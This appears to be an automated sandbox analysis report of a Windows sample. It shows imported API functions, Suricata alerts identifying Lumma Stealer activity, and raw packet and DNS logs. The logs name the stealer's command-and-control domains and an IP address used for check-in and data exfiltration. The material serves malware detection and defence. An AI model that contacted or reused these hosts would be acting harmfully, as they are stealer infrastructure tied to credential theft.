SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-07T15:45:54.878018+0100	2058616	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (nearycrepso .shop)	1	192.168.2.6	59238	1.1.1.1	53	UDP
2025-01-07T15:45:54.902008+0100	2058598	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (abruptyopsn .shop)	1	192.168.2.6	61213	1.1.1.1	53	UDP
2025-01-07T15:45:54.914008+0100	2058632	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (wholersorie .shop)	1	192.168.2.6	52558	1.1.1.1	53	UDP
2025-01-07T15:45:54.929024+0100	2058610	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (framekgirus .shop)	1	192.168.2.6	61304	1.1.1.1	53	UDP
2025-01-07T15:45:54.941156+0100	2058628	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (tirepublicerj .shop)	1	192.168.2.6	51625	1.1.1.1	53	UDP
2025-01-07T15:45:54.953023+0100	2058618	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (noisycuttej .shop)	1	192.168.2.6	63595	1.1.1.1	53	UDP
2025-01-07T15:45:54.972074+0100	2058622	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (rabidcowse .shop)	1	192.168.2.6	60313	1.1.1.1	53	UDP
2025-01-07T15:45:54.988060+0100	2058606	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (cloudewahsj .shop)	1	192.168.2.6	50699	1.1.1.1	53	UDP
2025-01-07T15:45:55.742966+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50736	104.102.49.254	443	TCP
2025-01-07T15:45:56.253659+0100	2858666	ETPRO MALWARE Win32/Lumma Stealer Steam Profile Lookup	1	192.168.2.6	50736	104.102.49.254	443	TCP
2025-01-07T15:45:56.841787+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50737	104.21.64.1	443	TCP
2025-01-07T15:45:57.172707+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.6	50737	104.21.64.1	443	TCP
2025-01-07T15:45:57.172707+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50737	104.21.64.1	443	TCP
2025-01-07T15:45:57.643942+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50738	104.21.64.1	443	TCP
2025-01-07T15:45:58.137343+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.6	50738	104.21.64.1	443	TCP
2025-01-07T15:45:58.137343+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50738	104.21.64.1	443	TCP
2025-01-07T15:45:58.807522+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50739	104.21.64.1	443	TCP
2025-01-07T15:45:59.958646+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50740	104.21.64.1	443	TCP
2025-01-07T15:46:01.049260+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50741	104.21.64.1	443	TCP
2025-01-07T15:46:02.386841+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50742	104.21.64.1	443	TCP
2025-01-07T15:46:02.735849+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.6	50742	104.21.64.1	443	TCP
2025-01-07T15:46:03.635728+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50743	104.21.64.1	443	TCP
2025-01-07T15:46:04.797695+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.6	50744	104.21.64.1	443	TCP
2025-01-07T15:46:05.278650+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.6	50744	104.21.64.1	443	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 15:45:51.688318968 CET	50731	53	192.168.2.6	162.159.36.2
Jan 7, 2025 15:45:51.693111897 CET	53	50731	162.159.36.2	192.168.2.6
Jan 7, 2025 15:45:51.693231106 CET	50731	53	192.168.2.6	162.159.36.2
Jan 7, 2025 15:45:51.698065042 CET	53	50731	162.159.36.2	192.168.2.6
Jan 7, 2025 15:45:52.286669016 CET	50731	53	192.168.2.6	162.159.36.2
Jan 7, 2025 15:45:52.292876005 CET	53	50731	162.159.36.2	192.168.2.6
Jan 7, 2025 15:45:52.292948961 CET	50731	53	192.168.2.6	162.159.36.2
Jan 7, 2025 15:45:55.087388039 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.087436914 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:55.088387012 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.092164040 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.092178106 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:55.742883921 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:55.742965937 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.744935036 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.744949102 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:55.745196104 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:55.790399075 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.799670935 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:55.847332001 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253724098 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253747940 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253779888 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253799915 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253823996 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253840923 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.253870964 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.253896952 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.253923893 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.346896887 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.346957922 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.347064972 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.347084045 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.347134113 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.351931095 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.352021933 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.356408119 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.356467962 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.356476068 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.356527090 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.357686996 CET	50736	443	192.168.2.6	104.102.49.254
Jan 7, 2025 15:45:56.357702971 CET	443	50736	104.102.49.254	192.168.2.6
Jan 7, 2025 15:45:56.369738102 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.369775057 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:56.369843006 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.370121956 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.370134115 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:56.841669083 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:56.841787100 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.843317986 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.843329906 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:56.843576908 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:56.844857931 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.844883919 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:56.844932079 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.172729015 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.172827005 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.172895908 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.173129082 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.173151970 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.173167944 CET	50737	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.173175097 CET	443	50737	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.178766966 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.178817987 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.178896904 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.179157972 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.179172039 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.643850088 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.643942118 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.647497892 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.647510052 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.647753954 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:57.648828983 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.648859024 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:57.648893118 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137353897 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137430906 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137465000 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137495041 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.137502909 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137512922 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137548923 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.137569904 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.137610912 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.137617111 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.138026953 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.138067961 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.138082027 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.138087034 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.138137102 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.138140917 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.142011881 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.142072916 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.142077923 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.196749926 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.224653006 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.224761963 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.224833012 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.224833965 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.224880934 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.225039959 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.225059986 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.225071907 CET	50738	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.225078106 CET	443	50738	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.341146946 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.341196060 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.341276884 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.341574907 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.341586113 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.807378054 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.807522058 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.808721066 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.808732986 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.808981895 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:58.810139894 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.810282946 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:58.810321093 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.396249056 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.396357059 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.396429062 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.396598101 CET	50739	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.396617889 CET	443	50739	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.483097076 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.483133078 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.483206034 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.483537912 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.483551979 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.958556890 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.958646059 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.959908009 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.959927082 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.960160971 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.961437941 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.961577892 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:45:59.961611986 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:45:59.961833954 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.007340908 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:00.376817942 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:00.376912117 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:00.376976967 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.378298044 CET	50740	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.378315926 CET	443	50740	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:00.591464043 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.591517925 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:00.591598034 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.591902018 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:00.591913939 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.049165010 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.049259901 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.050528049 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.050538063 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.050780058 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.051954031 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.052083969 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.052107096 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.052177906 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.052184105 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.705703974 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.705797911 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.705869913 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.705986977 CET	50741	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.706002951 CET	443	50741	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.882211924 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.882256031 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:01.882328987 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.882647038 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:01.882659912 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.386708021 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.386841059 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.388113976 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.388127089 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.388364077 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.389506102 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.389592886 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.389599085 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.735874891 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.735985994 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:02.736192942 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.736280918 CET	50742	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:02.736300945 CET	443	50742	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.155977964 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.156033039 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.156105042 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.156819105 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.156831026 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.635621071 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.635727882 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.636984110 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.636989117 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.637207031 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:03.638330936 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.638407946 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:03.638413906 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.178708076 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.178797960 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.178962946 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.179207087 CET	50743	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.179229021 CET	443	50743	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.180952072 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.180999994 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.181099892 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.181411028 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.181426048 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.797584057 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.797694921 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.799034119 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.799045086 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.799278975 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:04.800472021 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.800499916 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:04.800540924 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:05.278664112 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:05.278753996 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:05.278836012 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:05.278992891 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:05.279015064 CET	443	50744	104.21.64.1	192.168.2.6
Jan 7, 2025 15:46:05.279027939 CET	50744	443	192.168.2.6	104.21.64.1
Jan 7, 2025 15:46:05.279035091 CET	443	50744	104.21.64.1	192.168.2.6

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 7, 2025 15:45:19.073262930 CET	57820	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:19.082894087 CET	53	57820	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:51.687833071 CET	53	60214	162.159.36.2	192.168.2.6
Jan 7, 2025 15:45:52.305670977 CET	53	60211	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.860075951 CET	64196	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.869333029 CET	53	64196	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.878017902 CET	59238	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.891154051 CET	53	59238	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.902008057 CET	61213	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.909256935 CET	53	61213	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.914007902 CET	52558	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.925497055 CET	53	52558	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.929023981 CET	61304	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.937640905 CET	53	61304	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.941155910 CET	51625	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.947957039 CET	53	51625	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.953022957 CET	63595	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.964819908 CET	53	63595	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.972074032 CET	60313	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:54.978986025 CET	53	60313	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:54.988059998 CET	50699	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:55.067394018 CET	53	50699	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:55.072412968 CET	53374	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:55.079068899 CET	53	53374	1.1.1.1	192.168.2.6
Jan 7, 2025 15:45:56.359956026 CET	61950	53	192.168.2.6	1.1.1.1
Jan 7, 2025 15:45:56.369052887 CET	53	61950	1.1.1.1	192.168.2.6

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 7, 2025 15:45:19.073262930 CET	192.168.2.6	1.1.1.1	0xe084	Standard query (0)	EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.860075951 CET	192.168.2.6	1.1.1.1	0x1862	Standard query (0)	lastlossunbag.click	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.878017902 CET	192.168.2.6	1.1.1.1	0x2f3a	Standard query (0)	nearycrepso.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.902008057 CET	192.168.2.6	1.1.1.1	0xd530	Standard query (0)	abruptyopsn.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.914007902 CET	192.168.2.6	1.1.1.1	0x19d7	Standard query (0)	wholersorie.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.929023981 CET	192.168.2.6	1.1.1.1	0x6fa	Standard query (0)	framekgirus.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.941155910 CET	192.168.2.6	1.1.1.1	0xb1db	Standard query (0)	tirepublicerj.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.953022957 CET	192.168.2.6	1.1.1.1	0x84b	Standard query (0)	noisycuttej.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.972074032 CET	192.168.2.6	1.1.1.1	0x3fc	Standard query (0)	rabidcowse.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.988059998 CET	192.168.2.6	1.1.1.1	0xd0e2	Standard query (0)	cloudewahsj.shop	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:55.072412968 CET	192.168.2.6	1.1.1.1	0xfbdd	Standard query (0)	steamcommunity.com	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:56.359956026 CET	192.168.2.6	1.1.1.1	0xa865	Standard query (0)	sputnik-1985.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jan 7, 2025 15:45:07.535725117 CET	1.1.1.1	192.168.2.6	0x7a67	No error (0)	shed.dual-low.s-part-0017.t-0009.t-msedge.net	s-part-0017.t-0009.t-msedge.net		CNAME (Canonical name)	IN (0x0001)	false
Jan 7, 2025 15:45:07.535725117 CET	1.1.1.1	192.168.2.6	0x7a67	No error (0)	s-part-0017.t-0009.t-msedge.net		13.107.246.45	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:19.082894087 CET	1.1.1.1	192.168.2.6	0xe084	Name error (3)	EDfttWxgFMWaHfidSCzybfKyg.EDfttWxgFMWaHfidSCzybfKyg	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.869333029 CET	1.1.1.1	192.168.2.6	0x1862	Name error (3)	lastlossunbag.click	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.891154051 CET	1.1.1.1	192.168.2.6	0x2f3a	Name error (3)	nearycrepso.shop	none	none	A (IP address)	IN (0x0001)	false
Jan 7, 2025 15:45:54.909256935 CET	1.1.1.1	192.168.2.6	0xd530	Name error (3)	abruptyopsn.shop	none	none	A (IP address)	IN (0x0001)	false
